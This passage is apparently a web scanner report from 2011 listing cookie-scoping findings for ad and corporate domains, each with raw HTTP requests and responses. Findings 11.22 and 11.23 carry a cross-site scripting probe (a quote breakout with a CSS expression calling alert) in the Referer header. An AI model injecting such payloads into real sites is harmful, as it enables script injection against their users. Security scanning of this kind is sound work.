Content-Type: text/html;charset=UTF-8
Content-Length: 147542

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
<head>
<m
...[SNIP]...

11.16. http://www.trw.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.trw.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESSec9a802c73b09f70b19df80cd6286d02=kdi10q8smc5gnbf5onr9ocvdj0; expires=Sat, 26 Feb 2011 07:39:57 GMT; path=/; domain=.trw.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.trw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 04:06:37 GMT
Server: Apache/2.2.10 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESSec9a802c73b09f70b19df80cd6286d02=kdi10q8smc5gnbf5onr9ocvdj0; expires=Sat, 26 Feb 2011 07:39:57 GMT; path=/; domain=.trw.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 04:06:37 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

11.17. http://a.rad.msn.com/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.rad.msn.com
Path:	/ADSAdClient31.dll

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

FC09=FB=AgEAaA5VvUAB; expires=Tue, 05-Feb-2013 12:00:00 GMT; domain=.rad.msn.com; path=/; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PG=SPTSN3&AP=1090 HTTP/1.1
Host: a.rad.msn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e

Response

11.18. http://ad-emea.doubleclick.net/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/click

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

id=c653243310000d9|1984865/1006548/15007|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click;h=v8/3aa2/f/3cd/*/n;235235065;0-0;0;59067898;4307-300/250;40443113/40460900/1;;~sscs=?http:/ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=http%3a%2f%2flp2.turbotax.com/ty10/bn/geo_tx%3Fcid%3Dbn_im_nf_anb_opgeotxT_txG_pk_300x250%26priorityCode%3D4654800000 HTTP/1.1
Host: ad-emea.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http:%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http:%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=http:%2f%2flp2.turbotax.com/ty10/bn/geo_tx%3Fcid%3Dbn_im_nf_anb_opgeotxT_txG_pk_300x250%26priorityCode%3D4654800000
Set-Cookie: id=c653243310000d9|1984865/1006548/15007|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Wed, 02 Feb 2011 16:18:22 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close

11.19. http://ad.doubleclick.net/ad/N4492.MSN/B5014254.59 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/ad/N4492.MSN/B5014254.59

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

id=c37ccbd32000070||t=1296715715|et=730|cs=dt-1jb2n; path=/; domain=.doubleclick.net; expires=Sat, 02 Feb 2013 06:48:35 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Wed, 02 Feb 2011 06:48:35 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad/N4492.MSN/B5014254.59 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; test_cookie=CheckForPermission;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Date: Thu, 03 Feb 2011 06:48:35 GMT
Location: http://s0.2mdn.net/viewad/817-grey.gif
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: id=c37ccbd32000070||t=1296715715|et=730|cs=dt-1jb2n; path=/; domain=.doubleclick.net; expires=Sat, 02 Feb 2013 06:48:35 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Wed, 02 Feb 2011 06:48:35 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close

11.20. http://ad.doubleclick.net/ad/N553.126834.KONTERATECHNOLOGIES/B5039995 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/ad/N553.126834.KONTERATECHNOLOGIES/B5039995

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 01 Feb 2011 14:46:15 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/N553.126834.KONTERATECHNOLOGIES/B5039995 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Date: Tue, 01 Feb 2011 14:31:15 GMT
Location: http://s0.2mdn.net/viewad/817-grey.gif
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 01 Feb 2011 14:46:15 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Server: GFE/2.0
Content-Type: text/html
Connection: close

11.21. http://ad.doubleclick.net/adi/N3285.google/B2343920.91 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3285.google/B2343920.91

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

id=cb3d6bd32000037||t=1296716221|et=730|cs=9el-dbvd; path=/; domain=.doubleclick.net; expires=Sat, 02 Feb 2013 06:57:01 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Wed, 02 Feb 2011 06:57:01 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adi/N3285.google/B2343920.91 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; test_cookie=CheckForPermission;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 345
Set-Cookie: id=cb3d6bd32000037||t=1296716221|et=730|cs=9el-dbvd; path=/; domain=.doubleclick.net; expires=Sat, 02 Feb 2013 06:57:01 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Wed, 02 Feb 2011 06:57:01 GMT
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 06:57:01 GMT
Expires: Thu, 03 Feb 2011 06:57:01 GMT
Connection: close

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aa3/0/0/%2a/d;
...[SNIP]...

11.22. http://ad.doubleclick.net/adi/N3466.8451.ORBITZLLC/B4967866.3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3466.8451.ORBITZLLC/B4967866.3

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

id=2244e57c0c01002a||t=1296573792|et=730|cs=pkhwecaq; expires=Thu, 31-Jan-2013 15:23:12 GMT; path=/; domain=.doubleclick.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adi/N3466.8451.ORBITZLLC/B4967866.3;sz=300x250;ord=[timestamp]? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x:expression(alert(1))%221333ba1041f
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.doubleclick.net
Proxy-Connection: Keep-Alive
Cookie: test_cookie=CheckForPermission

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Tue, 01 Feb 2011 15:23:12 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: id=2244e57c0c01002a||t=1296573792|et=730|cs=pkhwecaq; expires=Thu, 31-Jan-2013 15:23:12 GMT; path=/; domain=.doubleclick.net
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 6715

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;">
<!-- Code auto-generated
...[SNIP]...

11.23. http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4406.Orbitzcom/B5147944.4

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 01 Feb 2011 15:37:55 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adi/N4406.Orbitzcom/B5147944.4;sz=728x90;ord=bkkcdnf,bguqjkndpyrh? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x:expression(alert(1))%221333ba1041f
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.doubleclick.net
Proxy-Connection: Keep-Alive

Response

11.24. http://ad.doubleclick.net/adi/dmd.ehow/homepage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/dmd.ehow/homepage

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

id=ca5f3b5320000b9||t=1296663503|et=730|cs=lv-flm96; path=/; domain=.doubleclick.net; expires=Fri, 01 Feb 2013 16:18:23 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 01 Feb 2011 16:18:23 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adi/dmd.ehow/homepage HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=ce03cb532000061||t=1296659799|et=730|cs=dxq5uhqs; test_cookie=CheckForPermission;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 393
Set-Cookie: id=ca5f3b5320000b9||t=1296663503|et=730|cs=lv-flm96; path=/; domain=.doubleclick.net; expires=Fri, 01 Feb 2013 16:18:23 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 01 Feb 2011 16:18:23 GMT
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 02 Feb 2011 16:18:23 GMT
Expires: Wed, 02 Feb 2011 16:18:23 GMT
Connection: close

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/
...[SNIP]...

11.25. http://ad.doubleclick.net/adj/dmd.ehow/gen previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/dmd.ehow/gen

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

id=c8b2db5320000e0||t=1296659579|et=730|cs=cn7-xujn; path=/; domain=.doubleclick.net; expires=Fri, 01 Feb 2013 15:12:59 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 01 Feb 2011 15:12:59 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/dmd.ehow/gen;vid=0;ugc=0;tile=1;dcopt=ist;sz=249x77;ord=7604261779973406? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: test_cookie=CheckForPermission

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Set-Cookie: id=c8b2db5320000e0||t=1296659579|et=730|cs=cn7-xujn; path=/; domain=.doubleclick.net; expires=Fri, 01 Feb 2013 15:12:59 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 01 Feb 2011 15:12:59 GMT
Date: Wed, 02 Feb 2011 15:12:59 GMT
Cache-Control: private, x-gzip-ok=""
Expires: Wed, 02 Feb 2011 15:12:59 GMT
Content-Length: 262

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aa2/0/0/%2a/a;44306;0-0;0;51754065;37789-249/77;0/0/0;;~aopt=2/1/36/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-
...[SNIP]...

11.26. http://ad.doubleclick.net/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/click

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

id=ca5f3b5320000dd|1890937/408080/15007|t=1296663507|et=730|cs=woptkuft; path=/; domain=.doubleclick.net; expires=Fri, 01 Feb 2013 16:18:27 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 01 Feb 2011 16:18:27 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click;h=v8/3aa2/17/1d3/*/o;231173167;2-0;0;55360143;4307-300/250;40534690/40552477/1;;~okv=;pc=[TPAS_ID];;~sscs=?http:/ad.thewheelof.com/clk?2,13%3B653249d08c366ff1%3B12de6eda05f,0%3B%3B%3B1017169916,NwQAAD4rFgD4vmoAAAAAACJcHgAAAAAAAgAAAAIAAAAAAP8AAAAECkpVJAAAAAAAl5IEAAAAAABSBigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAGZ.t5i0BAAAAAAAAAGI1OTgxOTRhLTJlZGUtMTFlMC05YmRiLTAwMzA0OGQ2ZDg5MABwAAAAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Btile%3D2%3Bord%3D2735259747132%3F,http://www.autocheck.com/?WT.mc_id=3499&siteID=3499 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=ce03cb532000061||t=1296659799|et=730|cs=dxq5uhqs; test_cookie=CheckForPermission;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://ad.thewheelof.com/clk?2,13%3B653249d08c366ff1%3B12de6eda05f,0%3B%3B%3B1017169916,NwQAAD4rFgD4vmoAAAAAACJcHgAAAAAAAgAAAAIAAAAAAP8AAAAECkpVJAAAAAAAl5IEAAAAAABSBigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAGZ.t5i0BAAAAAAAAAGI1OTgxOTRhLTJlZGUtMTFlMC05YmRiLTAwMzA0OGQ2ZDg5MABwAAAAAAA=,,http://ad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Btile%3D2%3Bord%3D2735259747132%3F,http://www.autocheck.com/?WT.mc_id=3499&siteID=3499
Set-Cookie: id=ca5f3b5320000dd|1890937/408080/15007|t=1296663507|et=730|cs=woptkuft; path=/; domain=.doubleclick.net; expires=Fri, 01 Feb 2013 16:18:27 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 01 Feb 2011 16:18:27 GMT
Date: Wed, 02 Feb 2011 16:18:27 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close

11.27. http://ad.doubleclick.net/clk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clk

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

id=c653243310000d9|737194/848412/15006|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clk;235700229;59276878;v HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; test_cookie=;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://weeklyad.staples.com/staples/new_user_entry.aspx?adref=2011Q1WeeklyAdMSNTextlink&cm_mmc=display_ads-_-WeeklyAd2011-_-OLC-_-MSN&cid=BAN:RETAIL:MSN:MSN:WEEKLYAD:20110201:TEXTLINK:VARIOUS:N
Set-Cookie: id=c653243310000d9|737194/848412/15006|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Tue, 01 Feb 2011 15:29:56 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close

11.28. http://adclick.g.doubleclick.net/aclk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adclick.g.doubleclick.net
Path:	/aclk

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

test_cookie=CheckForPermission; expires=Tue, 01-Feb-2011 15:45:05 GMT; path=/; domain=.doubleclick.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aclk HTTP/1.1
Host: adclick.g.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=CheckForPermission; expires=Tue, 01-Feb-2011 15:45:05 GMT; path=/; domain=.doubleclick.net
X-Content-Type-Options: nosniff
Date: Tue, 01 Feb 2011 15:30:05 GMT
Server: AdClickServer
Content-Length: 0
X-XSS-Protection: 1; mode=block
Connection: close

11.29. http://ads.adbrite.com/adserver/vdi/762701 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/762701

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

vsd="0@1@4d497418@www.ehow.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/
srh=1%3Aq64FAA%3D%3D; Domain=.adbrite.com; Expires=Thu, 03-Feb-2011 15:11:20 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/762701?d=D8DB51BF08484217F5D14AB47F4002AD HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=168362173x0.688+1294536261x899753879; cv=1%3Aq1ZyLi0uyc91zUtWslIySyktr0nPLLDMMi8zrjGwMswuNjMusjK0MlCqBQA%3D; ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z9dJzsiwSC%2BoysmrMczJSS%2BqqjGsMYAJZuUgCSrpKCUl5uWlFmWCjVKqrQUA; rb="0:712156:20822400:6ch47d7o8wtv:0:742697:20828160:3011330574290390485:0:753292:20858400:CA-00000000456885722:0:762701:20861280:D8DB51BF08484217F5D14AB47F4002AD:0:806205:20861280:21d8e954-2b06-11e0-8e8a-0025900870d2:0"

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Wed, 02 Feb 2011 15:11:19 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: Apache-Coyote/1.1
Set-Cookie: vsd="0@1@4d497418@www.ehow.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/
Set-Cookie: srh=1%3Aq64FAA%3D%3D; Domain=.adbrite.com; Expires=Thu, 03-Feb-2011 15:11:20 GMT; Path=/
Content-Length: 42

GIF89a.............!.......,........@..D.;

11.30. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

